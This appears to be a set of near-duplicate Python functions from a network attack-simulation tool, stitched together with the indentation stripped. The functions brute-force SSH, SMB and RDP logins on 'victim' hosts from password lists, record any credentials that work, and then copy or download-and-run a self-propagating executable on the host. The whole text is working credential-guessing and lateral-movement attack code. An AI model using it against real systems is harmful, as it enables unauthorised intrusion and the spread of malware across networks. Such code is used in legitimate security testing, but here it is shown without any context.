def exploit_host(self, host, depth=-1, src_path=None):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
port = SSH_PORT
# if ssh banner found on different port, use that port.
for servkey, servdata in host.services.items():
if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'):
port = int(servkey.replace('tcp-', ''))
is_open, _ = check_port_tcp(host.ip_addr, port)
if not is_open:
LOG.info("SSH port is closed on %r, skipping", host)
return False
passwords = list(self._config.ssh_passwords[:])
users = list(self._config.ssh_users)
known_passwords = [host.get_credentials(x) for x in users]
if len(known_passwords) > 0:
for known_pass in known_passwords:
if known_pass in passwords:
passwords.remove(known_pass)
passwords.insert(0, known_pass) #try first
user_pass = product(users, passwords)
exploited = False
for user, curpass in user_pass:
try:
ssh.connect(host.ip_addr,
username=user,
password=curpass,
port=port,
timeout=None)
LOG.debug("Successfully logged in %r using SSH (%s : %s)",
host, user, curpass)
host.learn_credentials(user, curpass)
exploited = True
break
except Exception, exc:
LOG.debug(
"Error logging into victim %r with user"
" %s and password '%s': (%s)", host, user, curpass, exc)
report_failed_login(self, host, user, curpass)
continue
def exploit_host(self, host, depth=-1, src_path=None):
assert isinstance(host, VictimHost)
src_path = src_path or get_target_monkey(host)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", host)
return False
passwords = list(self._config.psexec_passwords[:])
known_password = host.get_credentials(self._config.psexec_user)
if known_password is not None:
if known_password in passwords:
passwords.remove(known_password)
passwords.insert(0, known_password)
exploited = False
for password in passwords:
try:
# copy the file remotely using SMB
remote_full_path = SmbTools.copy_file(
host, self._config.psexec_user, password, src_path,
self._config.dropper_target_path,
self._config.smb_download_timeout)
if remote_full_path is not None:
LOG.debug("Successfully logged in %r using SMB (%s : %s)",
host, self._config.psexec_user, password)
host.learn_credentials(self._config.psexec_user, password)
exploited = True
break
else:
# failed exploiting with this user/pass
report_failed_login(self, host, self._config.psexec_user,
password)
except Exception, exc:
LOG.debug(
"Exception when trying to copy file using SMB to %r with user"
" %s and password '%s': (%s)", host,
self._config.psexec_user, password, exc)
continue
def exploit_host(self, host, depth=-1, src_path=None):
assert isinstance(host, VictimHost)
src_path = src_path or get_target_monkey(host)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", host)
return False
passwords = list(self._config.psexec_passwords[:])
known_password = host.get_credentials(self._config.psexec_user)
if known_password is not None:
if known_password in passwords:
passwords.remove(known_password)
passwords.insert(0, known_password)
exploited = False
for password in passwords:
try:
# copy the file remotely using SMB
remote_full_path = SmbTools.copy_file(host,
self._config.psexec_user,
password,
src_path,
self._config.dropper_target_path,
self._config.smb_download_timeout)
if remote_full_path is not None:
LOG.debug("Successfully logged in %r using SMB (%s : %s)",
host, self._config.psexec_user, password)
host.learn_credentials(self._config.psexec_user, password)
exploited = True
break
else:
# failed exploiting with this user/pass
report_failed_login(self, host, self._config.psexec_user, password)
except Exception, exc:
LOG.debug("Exception when trying to copy file using SMB to %r with user"
" %s and password '%s': (%s)", host,
self._config.psexec_user, password, exc)
continue
def exploit_host(self, host, depth=-1, src_path=None):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
port = SSH_PORT
# if ssh banner found on different port, use that port.
for servkey, servdata in host.services.items():
if servdata.get("name") == "ssh" and servkey.startswith("tcp-"):
port = int(servkey.replace("tcp-", ""))
is_open, _ = check_port_tcp(host.ip_addr, port)
if not is_open:
LOG.info("SSH port is closed on %r, skipping", host)
return False
passwords = list(self._config.ssh_passwords[:])
users = list(self._config.ssh_users)
known_passwords = [host.get_credentials(x) for x in users]
if len(known_passwords) > 0:
for known_pass in known_passwords:
if known_pass in passwords:
passwords.remove(known_pass)
passwords.insert(0, known_pass) # try first
user_pass = product(users, passwords)
exploited = False
for user, curpass in user_pass:
try:
ssh.connect(host.ip_addr, username=user, password=curpass, port=port, timeout=None)
LOG.debug("Successfully logged in %r using SSH (%s : %s)", host, user, curpass)
host.learn_credentials(user, curpass)
exploited = True
break
except Exception, exc:
LOG.debug(
"Error logging into victim %r with user" " %s and password '%s': (%s)", host, user, curpass, exc
)
report_failed_login(self, host, user, curpass)
continue
def exploit_host(self, host, depth=-1, src_path=None):
global g_reactor
assert isinstance(host, VictimHost)
is_open, _ = check_port_tcp(host.ip_addr, RDP_PORT)
if not is_open:
LOG.info("RDP port is closed on %r, skipping", host)
return False
src_path = src_path or get_target_monkey(host)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", host)
return False
# create server for http download.
http_path, http_thread = HTTPTools.create_transfer(host, src_path)
if not http_path:
LOG.debug(
"Exploiter RdpGrinder failed, http transfer creation failed.")
return False
cmdline = build_monkey_commandline(host, depth - 1)
if self._config.rdp_use_vbs_download:
command = RDP_CMDLINE_HTTP_VBS % {
'monkey_path': self._config.dropper_target_path,
'http_path': http_path,
'parameters': cmdline
}
else:
command = RDP_CMDLINE_HTTP_BITS % {
'monkey_path': self._config.dropper_target_path,
'http_path': http_path,
'parameters': cmdline
}
passwords = list(self._config.psexec_passwords[:])
known_password = host.get_credentials(self._config.psexec_user)
if known_password is not None:
if known_password in passwords:
passwords.remove(known_password)
passwords.insert(0, known_password)
if not g_reactor.is_alive():
g_reactor.daemon = True
g_reactor.start()
exploited = False
for password in passwords:
try:
# run command using rdp.
LOG.info(
"Trying rdp logging into victim %r with user %s and password '%s'",
host, self._config.psexec_user, password)
client_factory = CMDClientFactory(self._config.psexec_user,
password, "", command)
reactor.callFromThread(reactor.connectTCP, host.ip_addr,
RDP_PORT, client_factory)
client_factory.done_event.wait()
if client_factory.success:
exploited = True
host.learn_credentials(self._config.psexec_user, password)
break
else:
# failed exploiting with this user/pass
report_failed_login(self, host, self._config.psexec_user,
password)
except Exception, exc:
LOG.debug(
"Error logging into victim %r with user"
" %s and password '%s': (%s)", host,
self._config.psexec_user, password, exc)
continue
def exploit_host(self, host, depth=-1, src_path=None):
global g_reactor
assert isinstance(host, VictimHost)
is_open, _ = check_port_tcp(host.ip_addr, RDP_PORT)
if not is_open:
LOG.info("RDP port is closed on %r, skipping", host)
return False
src_path = src_path or get_target_monkey(host)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", host)
return False
# create server for http download.
http_path, http_thread = HTTPTools.create_transfer(host, src_path)
if not http_path:
LOG.debug("Exploiter RdpGrinder failed, http transfer creation failed.")
return False
LOG.info("Started http server on %s", http_path)
cmdline = build_monkey_commandline(host, depth-1)
if self._config.rdp_use_vbs_download:
command = RDP_CMDLINE_HTTP_VBS % {
'monkey_path': self._config.dropper_target_path,
'http_path': http_path, 'parameters': cmdline}
else:
command = RDP_CMDLINE_HTTP_BITS % {
'monkey_path': self._config.dropper_target_path,
'http_path': http_path, 'parameters': cmdline}
passwords = list(self._config.psexec_passwords[:])
known_password = host.get_credentials(self._config.psexec_user)
if known_password is not None:
if known_password in passwords:
passwords.remove(known_password)
passwords.insert(0, known_password)
if not g_reactor.is_alive():
g_reactor.daemon = True
g_reactor.start()
exploited = False
for password in passwords:
try:
# run command using rdp.
LOG.info("Trying RDP logging into victim %r with user %s and password '%s'",
host, self._config.psexec_user, password)
LOG.info("RDP connected to %r", host)
client_factory = CMDClientFactory(self._config.psexec_user, password, "", command)
reactor.callFromThread(reactor.connectTCP, host.ip_addr, RDP_PORT, client_factory)
client_factory.done_event.wait()
if client_factory.success:
exploited = True
host.learn_credentials(self._config.psexec_user, password)
break
else:
# failed exploiting with this user/pass
report_failed_login(self, host, self._config.psexec_user, password)
except Exception, exc:
LOG.debug("Error logging into victim %r with user"
" %s and password '%s': (%s)", host,
self._config.psexec_user, password, exc)
continue
